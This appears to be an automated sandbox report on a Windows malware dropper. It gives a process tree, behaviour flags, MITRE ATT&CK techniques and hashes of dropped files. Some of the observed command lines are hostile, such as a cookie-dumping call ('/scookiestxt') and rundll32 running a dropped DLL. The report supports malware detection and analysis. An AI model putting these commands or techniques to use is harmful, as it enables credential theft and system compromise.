                                                            PID:4712
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                          1⤵
                                                            PID:68
                                                          • \??\c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                            1⤵
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1740
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                              2⤵
                                                              • Drops file in System32 directory
                                                              • Checks processor information in registry
                                                              • Modifies data under HKEY_USERS
                                                              • Modifies registry class
                                                              PID:3960
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_1.exe
                                                            sonia_1.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3172
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_1.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_1.exe" -a
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2988
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_6.exe
                                                            sonia_6.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1832
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:1588
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5048
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              2⤵
                                                                PID:5956
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                2⤵
                                                                  PID:5836
                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_4.exe
                                                                sonia_4.exe
                                                                1⤵
                                                                  PID:1092
                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2328
                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:4356
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:4056
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                          PID:3560
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          4⤵
                                                                            PID:2124
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                              PID:4160
                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4424
                                                                            • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:4892
                                                                          • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            PID:4504
                                                                            • C:\Windows\winnetdriv.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626784781 0
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:4652
                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4564
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 808
                                                                              4⤵
                                                                              • Drops file in Windows directory
                                                                              • Program crash
                                                                              PID:1748
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 840
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:4932
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 984
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:4976
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1056
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:4132
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1116
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:4488
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1104
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:4456
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1108
                                                                              4⤵
                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                              • Program crash
                                                                              PID:3280
                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4768
                                                                            • C:\Windows\system32\WerFault.exe
                                                                              C:\Windows\system32\WerFault.exe -u -p 4768 -s 1004
                                                                              4⤵
                                                                              • Program crash
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:5028
                                                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4680
                                                                            • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:4904
                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                        1⤵
                                                                        • Process spawned unexpected child process
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1280
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                          2⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3896
                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                        1⤵
                                                                        • Process spawned unexpected child process
                                                                        PID:4152
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                          2⤵
                                                                            PID:4160
                                                                        • C:\Windows\explorer.exe
                                                                          C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          1⤵
                                                                            PID:3912
                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                            1⤵
                                                                            • Process spawned unexpected child process
                                                                            PID:5220
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                              2⤵
                                                                              • Loads dropped DLL
                                                                              PID:5240
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                            1⤵
                                                                            • Drops file in Windows directory
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2124
                                                                          • C:\Windows\system32\browser_broker.exe
                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            PID:4128
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4036
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            PID:4596
                                                                          • \??\c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                            1⤵
                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                            PID:5304

                                                                          Network

                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                          Persistence

                                                                          Modify Existing Service

                                                                          1
                                                                          T1031

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1060

                                                                          Defense Evasion

                                                                          Modify Registry

                                                                          4
                                                                          T1112

                                                                          Disabling Security Tools

                                                                          1
                                                                          T1089

                                                                          Virtualization/Sandbox Evasion

                                                                          1
                                                                          T1497

                                                                          Install Root Certificate

                                                                          1
                                                                          T1130

                                                                          Credential Access

                                                                          Credentials in Files

                                                                          4
                                                                          T1081

                                                                          Discovery

                                                                          Query Registry

                                                                          6
                                                                          T1012

                                                                          Virtualization/Sandbox Evasion

                                                                          1
                                                                          T1497

                                                                          System Information Discovery

                                                                          6
                                                                          T1082

                                                                          Peripheral Device Discovery

                                                                          1
                                                                          T1120

                                                                          Remote System Discovery

                                                                          1
                                                                          T1018

                                                                          Collection

                                                                          Data from Local System

                                                                          4
                                                                          T1005

                                                                          Command and Control

                                                                          Web Service

                                                                          1
                                                                          T1102

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OLKbrowser.exe.log
                                                                            MD5

                                                                            7438b57da35c10c478469635b79e33e1

                                                                            SHA1

                                                                            5ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5

                                                                            SHA256

                                                                            b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70

                                                                            SHA512

                                                                            5887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\libcurl.dll
                                                                            MD5

                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                            SHA1

                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                            SHA256

                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                            SHA512

                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\libcurlpp.dll
                                                                            MD5

                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                            SHA1

                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                            SHA256

                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                            SHA512

                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\libgcc_s_dw2-1.dll
                                                                            MD5

                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                            SHA1

                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                            SHA256

                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                            SHA512

                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\libstdc++-6.dll
                                                                            MD5

                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                            SHA1

                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                            SHA256

                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                            SHA512

                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\libwinpthread-1.dll
                                                                            MD5

                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                            SHA1

                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                            SHA256

                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                            SHA512

                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\setup_install.exe
                                                                            MD5

                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                            SHA1

                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                            SHA256

                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                            SHA512

                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\setup_install.exe
                                                                            MD5

                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                            SHA1

                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                            SHA256

                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                            SHA512

                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_1.exe
                                                                            MD5

                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                            SHA1

                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                            SHA256

                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                            SHA512

                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_1.exe
                                                                            MD5

                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                            SHA1

                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                            SHA256

                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                            SHA512

                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_1.txt
                                                                            MD5

                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                            SHA1

                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                            SHA256

                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                            SHA512

                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_2.exe
                                                                            MD5

                                                                            18ffdaa7a2c9906db10ffc13f7c73d23

                                                                            SHA1

                                                                            f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                            SHA256

                                                                            365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                            SHA512

                                                                            db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_2.txt
                                                                            MD5

                                                                            18ffdaa7a2c9906db10ffc13f7c73d23

                                                                            SHA1

                                                                            f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                            SHA256

                                                                            365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                            SHA512

                                                                            db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_3.exe
                                                                            MD5

                                                                            ee658be7ea7269085f4004d68960e547

                                                                            SHA1

                                                                            979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                            SHA256

                                                                            d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                            SHA512

                                                                            fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_3.txt
                                                                            MD5

                                                                            ee658be7ea7269085f4004d68960e547

                                                                            SHA1

                                                                            979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                            SHA256

                                                                            d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                            SHA512

                                                                            fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_4.exe
                                                                            MD5

                                                                            6765fe4e4be8c4daf3763706a58f42d0

                                                                            SHA1

                                                                            cebb504bfc3097a95d40016f01123b275c97d58c

                                                                            SHA256

                                                                            755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                            SHA512

                                                                            c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_4.txt
                                                                            MD5

                                                                            6765fe4e4be8c4daf3763706a58f42d0

                                                                            SHA1

                                                                            cebb504bfc3097a95d40016f01123b275c97d58c

                                                                            SHA256

                                                                            755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                            SHA512

                                                                            c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_5.exe
                                                                            MD5

                                                                            0c3f670f496ffcf516fe77d2a161a6ee

                                                                            SHA1

                                                                            0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                            SHA256

                                                                            8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                            SHA512

                                                                            bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_5.txt
                                                                            MD5

                                                                            0c3f670f496ffcf516fe77d2a161a6ee

                                                                            SHA1

                                                                            0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                            SHA256

                                                                            8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                            SHA512

                                                                            bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_6.exe
                                                                            MD5

                                                                            2eb68e495e4eb18c86a443b2754bbab2

                                                                            SHA1

                                                                            82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                            SHA256

                                                                            a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                            SHA512

                                                                            f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_6.txt
                                                                            MD5

                                                                            2eb68e495e4eb18c86a443b2754bbab2

                                                                            SHA1

                                                                            82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                            SHA256

                                                                            a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                            SHA512

                                                                            f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                            MD5

                                                                            ba5a8020b3022821fd9510a50be8d004

                                                                            SHA1

                                                                            1700f22d6db1c3d8db9c10856dd96b3a86bac4bd

                                                                            SHA256

                                                                            7200d50443abb0f9bd8a7ef553d1cfcfd359ae1cf999cf82f285a2720affa306

                                                                            SHA512

                                                                            a4e70b5c8d48ca4b7d310af3ce12a3079f6ddfdd95913d6eb6e702d07ba3120d6b90c188a2fee477b0a8f1fe72cae62834ec69940b3a00eb89f90fa4c7fe7cb0

                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                            MD5

                                                                            ba5a8020b3022821fd9510a50be8d004

                                                                            SHA1

                                                                            1700f22d6db1c3d8db9c10856dd96b3a86bac4bd

                                                                            SHA256

                                                                            7200d50443abb0f9bd8a7ef553d1cfcfd359ae1cf999cf82f285a2720affa306

                                                                            SHA512

                                                                            a4e70b5c8d48ca4b7d310af3ce12a3079f6ddfdd95913d6eb6e702d07ba3120d6b90c188a2fee477b0a8f1fe72cae62834ec69940b3a00eb89f90fa4c7fe7cb0

                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                            MD5

                                                                            56bd0f698f28e63479e5697dd167926e

                                                                            SHA1

                                                                            a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                            SHA256

                                                                            6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                            SHA512

                                                                            f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                            MD5

                                                                            56bd0f698f28e63479e5697dd167926e

                                                                            SHA1

                                                                            a65ab942eb3b3ac45ecf24cf1a35d2734f14d666

                                                                            SHA256

                                                                            6a481c56aa97b2a75a3de488ce1a9a670c62fc364a432e8e68497f55fabb439d

                                                                            SHA512

                                                                            f8900374349e22a2eb2c4ae2598bb1ed5b0dd3ca2857e2fb10d2ed3474fea49a810eb92eb3a81e861bd47c54698fa934fe086bca7da6a1f164c34753b6d391f2

                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                            MD5

                                                                            8ddd5b9dbcd4e37135868db27b675c2d

                                                                            SHA1

                                                                            9122af279871de3f92ac3728e2343950f3e8b995

                                                                            SHA256

                                                                            2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                            SHA512

                                                                            e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                            MD5

                                                                            8ddd5b9dbcd4e37135868db27b675c2d

                                                                            SHA1

                                                                            9122af279871de3f92ac3728e2343950f3e8b995

                                                                            SHA256

                                                                            2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                            SHA512

                                                                            e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                            MD5

                                                                            8ddd5b9dbcd4e37135868db27b675c2d

                                                                            SHA1

                                                                            9122af279871de3f92ac3728e2343950f3e8b995

                                                                            SHA256

                                                                            2f480cbf73a6166257f6d35d7fb2d9f776e257540144a5c8e780385b4773a03f

                                                                            SHA512

                                                                            e712688ffe6d30aa1b21cba4fa88a6d1c4f72ba3b7d672ee2e790a6a42bc40df02761ced6a5cebcd5bc5ac6c5a2cdad7b04f427e3f02fb225132214b3e68664f

                                                                          • C:\Users\Admin\AppData\Local\Temp\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                            MD5

                                                                            87b1814412cdac3d08fad8dd3a79ebad

                                                                            SHA1

                                                                            ca1946721d023be9825a5afac4364248a56111e1

                                                                            SHA256

                                                                            2f4690b3c2587c0bfb81ab701d50e497406994613151faf007423c59ca5e2281

                                                                            SHA512

                                                                            999d6eeb454760a422fab3b1f1d3de6b99789838fdfe88f78a3af52842672f67bb4ca05ae157bf68cee6d96a1f4b0924555da67a4ffad9db9044e411e071d206

                                                                          • C:\Users\Admin\AppData\Local\Temp\api-ms-win-core-string-l1-1-0.dll
                                                                            MD5

                                                                            4c745dc13735b4822ff160cb18b61e22

                                                                            SHA1

                                                                            cdc23598548a2f1cbf9ac2ba1003b6d6af0471d0

                                                                            SHA256

                                                                            550d4fc902f25f2a0c09f475b5cecee43fb3a0a042126479560b0001db5c4891

                                                                            SHA512

                                                                            c4ac87fcd7f2130651c69d939929c013e663eb14502452808ab887a735f3de34ef28e9c98491c3d427b936d3e53c2840f3195ed6ee62d10730da29267d78149b

                                                                          • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                            MD5

                                                                            99ab358c6f267b09d7a596548654a6ba

                                                                            SHA1

                                                                            d5a643074b69be2281a168983e3f6bef7322f676

